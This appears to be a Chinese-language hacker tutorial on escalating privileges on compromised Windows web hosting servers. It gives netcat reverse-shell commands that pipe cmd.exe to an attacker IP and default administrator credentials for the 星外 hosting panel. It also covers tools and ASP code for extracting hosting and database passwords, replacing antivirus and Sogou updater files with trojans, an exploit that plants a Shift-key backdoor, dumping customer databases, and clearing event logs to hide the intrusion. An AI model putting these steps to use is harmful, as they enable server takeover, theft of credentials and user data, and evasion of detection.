提權

(( nc反彈提權 ))

 

當可以執行net user，但是不能建立用戶時，就可以用NC反彈提權試下，特別是內網服務器，最好用NC反彈提權。

 

不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個端口外的所有端口，那么這種方法也失效了….

 

找個可讀可寫目錄上傳nc.exe cmd.exe

 

 

-l 監聽本地入棧信息

 

-p port打開本地端口

 

-t 以telnet形式應答入棧請求

 

-e 程序重定向

 

本地cmd執行：nc -vv -l -p 52 進行反彈

 

接着在shell里執行命令：c:\windows\temp\nc.exe -vv 服務器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080這樣的端口，被防火牆攔截的幾率小很多

 

執行成功后本地cmd命令：cd/ （只是習慣而已）

 

接着以telnet命令連接服務器：telnet 服務器ip 999

 

回車出現已選定服務器的ip就說明成功了，接着權限比較大了，嘗試建立用戶！

 

壞蛋：

本地cmd執行：nc -vv -l -p 52 進行反彈

c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 服務器ip 52

 

低調小飛：

shell執行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe

 

 

一般這樣的格式執行成功率很小，不如直接在cmd那里輸入：c:\windows\temp\nc.exe 命令這里輸入：-vv 服務器ip 999 -e c:\windows\temp\cmd.exe

 

這個技巧成功率比上面那個大多了，不單單是nc可以這樣，pr這些提權exp也是可以的。

 

 

 

 

 

(( 星外提權 ))

 

如何知道是不是星外主機

 

？

 

第一：網站物理路徑存在“freehost”

第二：asp馬里點擊程序，存在“7i24虛擬主機管理平台”“星外主機”之類的文件夾

 

默認帳號：freehostrunat

默認密碼：fa41328538d7be36e83ae91a78a1b16f!7

 

freehostrunat這個用戶是安裝星外時自動建立的，已屬於administrators管理組，而且密碼不需要解密，直接登錄服務器即可

 

星外常寫目錄：

 

C:\RECYCLER\

C:\windows\temp\

e:\recycler\

f:\recycler\

C:\php\PEAR\

C:\WINDOWS\7i24.com\FreeHost

C:\php\dev

C:\System Volume Information

C:\7i24.com\serverdoctor\log\

C:\WINDOWS\Temp\

c:\windows\hchiblis.ibl

C:\7i24.com\iissafe\log\

C:\7i24.com\LinkGate\log

C:\Program Files\Thunder Network\Thunder7\

C:\Program Files\Thunder Network\Thunder\

C:\Program Files\Symantec AntiVirus\SAVRT\

c:\windows\DriverPacks\C\AM2

C:\Program Files\FlashFXP\

c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\

C:\Program Files\Zend\ZendOptimizer-3.3.0\

C:\Program Files\Common Files\

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

c:\Program Files\360\360Safe\deepscan\Section\mutex.db

c:\Program Files\Helicon\ISAPI_Rewrite3\error.log

c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log

c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf

c:\Program Files\Common Files\Symantec Shared\Persist.bak

c:\Program Files\Common Files\Symantec Shared\Validate.dat

c:\Program Files\Common Files\Symantec Shared\Validate.dat

C:\Program Files\Zend\ZendOptimizer-3.3.0\docs

C:\Documents and Settings\All Users\DRM\

C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection

C:\Documents and Settings\All Users\Application Data\360safe\softmgr\

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

 

 

ee提權法：

 

找個可讀可寫目錄上傳ee.exe

 

cmd命令：/c c:\windows\temp\cookies\ee.exe -i （獲取星外帳號的id值，例如回顯：FreeHost ID：724）

 

接着命令：/c c:\windows\temp\cookies\ee.exe -u 724 （獲取星外的帳號密碼）

 

 

vbs提權法：

 

找個可讀可寫目錄上傳cscript.exe iispwd.vbs

 

cmd命令：/c "c:\windows\temp\cookies\cscript.exe" c:\windows\temp\cookies\iispwd.vbs

 

意思是讀取iis，這樣一來，不但可以獲取星外的帳號密碼，還可以看到同服務器上的所有站點的目錄。

 

 

可行思路大全：

 

經測試以下目錄中的文件權限均為everyone，可以修改，可以上傳同文件名替換，刪除，最重要的是還可以執行：

 

360殺毒db文件替換:

c:\Program Files\360\360SD\deepscan\Section\mutex.db

c:\Program Files\360\360Safe\deepscan\Section\mutex.db

C:\Program Files\360\360Safe\AntiSection\mutex.db

 

IISrewrite3 文件替換：

C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log

C:\Program Files\Helicon\ISAPI_Rew

 

rite3\httpd.conf

C:\Program Files\Helicon\ISAPI_Rewrite3\error.log

 

諾頓殺毒文件替換:

c:\Program Files\Common Files\Symantec Shared\Persist.bak

c:\Program Files\Common Files\Symantec Shared\Validate.dat

c:\Program Files\Common Files\Symantec Shared\Persist.Dat

 

一流過濾相關目錄及文件：

C:\7i24.com\iissafe\log\startandiischeck.txt

C:\7i24.com\iissafe\log\scanlog.htm

 

其他:

Zend文件替換：C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

華盾文件替換：C:\WINDOWS\hchiblis.ibl

Flash文件替換：C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx

DU Meter流量統計信息日志文件替換：c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

 

 

 

 

 

(( 360提權 ))

 

找個可讀可寫目錄上傳360.exe

 

cmd命令：/c c:\windows\temp\cookies\360.exe

 

會提示3段英文：

 

360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2

 

You will get a Shift5 door!

 

Shift5 Backdoor created!

 

這是成功的征兆，接着連接服務器連按5下shift鍵，將彈出任務管理器，點擊新建任務：explorer.exe 會出現桌面，接下來大家都會弄了......

 

 

 

 

 

(( 搜狗提權 ))

 

搜狗的目錄默認是可讀可寫的，搜狗每隔一段時間就會自動升級，而升級的文件是pinyinup.exe

 

我們只要把這個文件替換為自己的遠控木馬，或是添加賬戶的批處理，等搜狗升級的時候，就可以達成我們的目的了。

 

 

 

 

 

(( 華眾虛擬主機提權 ))

 

就經驗來說，一般溢出提權對虛擬主機是無果的，而且華眾又沒有星外那么明顯的漏洞。

 

所以華眾提權關鍵之處就是搜集信息，主要注冊表位置：

 

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密碼

 

c:\windows\temp 下有hzhost主機留下的ftp登陸記錄有用戶名和密碼

 

以上信息配合hzhosts華眾虛擬主機系統6.x 破解數據庫密碼工具使用

 

百度搜索：hzhosts華眾虛擬主機系統6.x 破解數據庫密碼工具

 

 

 

 

 

 

(( N點虛擬主機 ))

 

N點虛擬主機管理系統默認數據庫地址為：\host_date\#host # date#.mdb

 

rl直接輸入不行 這里咱們替換下 #=%23 空格=%20

 

修改后的下載地址為/host_date/%23host%20%23%20date%23196.mdb

 

N點數據庫下載之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N點加密數據然后用N點解密工具解密得到FTP密碼

 

N點默認安裝路徑C:\Program Files\NpointSoft\npointhost\web\

D:\Program Files\NpointSoft\npointhost\web\

默認權限可讀。遇到對方所用虛擬主機是N點時候 可以考慮 讀取該文件夾下載數據庫

 

N點解密工具代碼

<%

set iishost=server.CreateObject(“npoint.host”)

 

x=iishost.Eduserpassword(“FTPpass

 

值”,0)

 

response.write x

%>

 

本地搭建N點環境在N點目錄打開訪問即可。得到密碼減去后10位字符即為 N點的虛擬主機管理密碼。

然后需要在管理系統登陸確認下 在hostcs 表 找到 Hostip 或者hostdomain

一般默認是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 這里可以不管 因為 這里不修改的話就是服務器默認ip地址sitehost 表的host_domain就是綁定的域名 直接查下IP地址即可 咱們批量的話 掃描的地址即可。

管理系統地址即為IP地址 選擇虛擬主機 登錄即可

接下來傳shell大家應該都會了。

接下來說提權 hostcs表存有sa root賬戶的密碼 解密方法一樣。默認都是 解密結果123456

還有就是在adminlogo 存在N點系統管理密碼 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下試試 或者用asm的工具破解下我的運氣不好沒成功過

3057C0DB854C878E72756088058775 這個是默認admin的密碼

 

 

 

 

 

(( 拖庫 ))

 

access數據庫脫褲很簡單，直接下載數據庫即可，mssql數據庫可以用shell自帶的脫褲功能，也可以用asp脫褲腳本，找到數據庫連接信息的文件，例如：web.config.asp

 

用帳號密碼登錄asp脫褲腳本，找到管理表，再找到會員庫（UserInfo），之后導出即可，mysql數據庫一般用php腳本，找網站數據連接信息：

 

'host' => 'localhost:3306', 數據庫ip

'user' => 'iwebs', 用戶

'passwd' => 'nnY5bvRNnJ4vKpmb', 密碼

'name' => 'iwebshop', 數據庫名

 

接着上傳php脫褲腳本，進入拖庫界面之后，左邊有一個選擇數據庫名的選項，這里是iwebshop，選擇數據庫名之后，就會出現列表，想脫哪個就點擊哪個，然后點擊select data

 

Import是導入的意思，而Export是導出的意思，我們在拖庫，當然是選擇Export了，之后選擇save，再點擊Export就開始脫褲了。

 

如果服務器上安裝了phpmysql，也可以找到該頁面，用剛找到的root賬號密碼登錄進去，在里面也是可以拖庫的，如同上傳php拖庫腳本一樣，操作差不多的。

 

 

 

 

 

(( 服務器 ))

 

命令提示符已被系統管理員停用？

解決方法：運行→gpedit.msc→用戶配置→管理模板→系統，在右側找到"阻止命令提示符", 然后雙擊一下,在"設置"里面選中"未配置" ,最后點擊"確定"。

 

 

如何判斷服務器的類型？

解決方法：直接ping服務器ip，看回顯信息進行判斷

 

TTL=32 9X/ME

 

TTL=64 linux

 

TTL=128 2000X/XP

 

TTL=255 UNIX

 

 

為什么有時3389開放卻不能連接？

原因分析：有時候是因為防火牆，把3389轉發到其他端口就可以連接了，有的轉發后依然是連接不上，那是因為管理員在TCP/IP里設置的端口限制

解決方法：我們需要把端口轉為TCP/IP里設置的

 

只允許連接的端口其中一個就可以了，更好的辦法是取消端口限制。

 

 

最簡單的往服務器上傳東西方法是什么？

本機打開“HFS網絡文件服務器”這款工具，把需要上傳的工具直接拖進左邊第一個框內，復制上面的地址，到服務器里的瀏覽器訪問，就可以下載了

 

 

限制“命令提示符”的運行權限？

我的電腦（右鍵）--資源管理器中--點擊“工具”按鈕，選擇“文件夾選項”，切換到“查看”標簽，去掉“使用簡單文件共享(推薦)”前面的鈎，這一步是為了讓文件的屬性菜單中顯示“安全”標簽，然后進入“c:\windows\system32\”，找到“cmd.exe”，點右鍵選擇“屬性”，切換到“安全”標簽，將其中“組或用戶名稱”中除了管理員外的所有用戶都刪除，完成后點“確定”這樣當普通用戶想運行“命令提示符”的時候將會出現“拒絕訪問”的警告框。

 

 

如何更改windows2003最大連接數？

windows2003中的遠程桌面功能非常方便，但是初始設置只允許2個用戶同時登陸，有些時候因為我在公司連接登陸后斷開，同事在家里用其他用戶登陸后斷開，當我再進行連接的時候，總是報錯“終端服務超過最大連接數”這時候我和同事都不能登陸，通過以下方法來增加連接數，運行：services.msc，啟用license logging，別忘了添加完畢后再關閉 License Logging

打開win2k3的控制面板中的“授權”，點“添加許可”輸入要改的連接數

 

 

如何清除服務器里的IP記錄日志？

1.我的電腦右鍵管理--事件查看器--安全性--右鍵清除所有事件

2.打開我的電腦--C盤--WINDOWS--system32--config--AppEvent.Evt屬性--安全--全部都拒絕

3.Klaklog.evt屬性--安全--全部都拒絕--SecEvent.Tvt屬性--安全--全部都拒絕